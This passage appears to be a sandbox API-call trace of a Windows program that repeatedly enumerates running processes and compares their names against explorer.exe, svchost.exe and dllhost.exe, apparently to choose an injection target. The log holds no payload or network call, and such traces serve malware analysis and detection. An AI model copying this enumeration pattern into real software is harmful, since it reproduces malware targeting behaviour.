hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0217.238] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0217.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0217.238] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0217.239] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.239] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.239] CloseHandle (hObject=0xec) returned 1 [0217.239] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0217.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0217.240] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.240] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.240] CloseHandle (hObject=0xec) returned 1 [0217.240] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0217.240] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0217.241] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.241] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.241] CloseHandle (hObject=0xec) returned 1 [0217.241] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0217.241] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0217.241] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.241] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.241] CloseHandle (hObject=0xec) returned 1 [0217.241] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.242] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0217.242] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.242] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.242] CloseHandle (hObject=0xec) returned 1 [0217.242] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0217.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0217.243] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.243] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.243] CloseHandle (hObject=0xec) returned 1 [0217.243] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0217.243] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0217.243] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0217.243] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0217.244] CloseHandle (hObject=0xe8) returned 1 [0217.244] Sleep (dwMilliseconds=0x3e8) [0218.299] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0218.301] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0218.301] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0218.302] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0218.302] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0218.303] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0218.303] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0218.304] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0218.304] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0218.305] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0218.305] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0218.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0218.306] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0218.306] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0218.307] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0218.307] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0218.308] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0218.308] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0218.309] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0218.309] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0218.310] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0218.310] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.310] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.310] CloseHandle (hObject=0xec) returned 1 [0218.310] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0218.311] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0218.311] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.311] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.312] CloseHandle (hObject=0xec) returned 1 [0218.312] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0218.312] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0218.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0218.313] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0218.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0218.313] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.313] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.313] CloseHandle (hObject=0xec) returned 1 [0218.313] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0218.313] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0218.313] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0218.313] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0218.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0218.314] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.314] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.314] CloseHandle (hObject=0xec) returned 1 [0218.314] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0218.314] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0218.314] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0218.314] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0218.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0218.314] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.314] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.315] CloseHandle (hObject=0xec) returned 1 [0218.315] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0218.315] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0218.315] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0218.315] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0218.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0218.315] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.315] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.315] CloseHandle (hObject=0xec) returned 1 [0218.315] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0218.315] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0218.315] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0218.315] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0218.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0218.316] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.316] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.316] CloseHandle (hObject=0xec) returned 1 [0218.316] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0218.316] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0218.316] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0218.316] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0218.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0218.317] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.317] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.317] CloseHandle (hObject=0xec) returned 1 [0218.317] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0218.317] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0218.317] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0218.317] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0218.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0218.317] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.317] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.317] CloseHandle (hObject=0xec) returned 1 [0218.317] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0218.317] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0218.317] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0218.317] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0218.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0218.318] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.318] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.318] CloseHandle (hObject=0xec) returned 1 [0218.318] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0218.318] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0218.318] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0218.318] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0218.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0218.319] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.319] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.319] CloseHandle (hObject=0xec) returned 1 [0218.319] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0218.319] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0218.319] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0218.319] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0218.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0218.319] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.319] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.319] CloseHandle (hObject=0xec) returned 1 [0218.319] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0218.319] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0218.319] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0218.319] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0218.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0218.320] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.320] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.320] CloseHandle (hObject=0xec) returned 1 [0218.320] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0218.320] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") 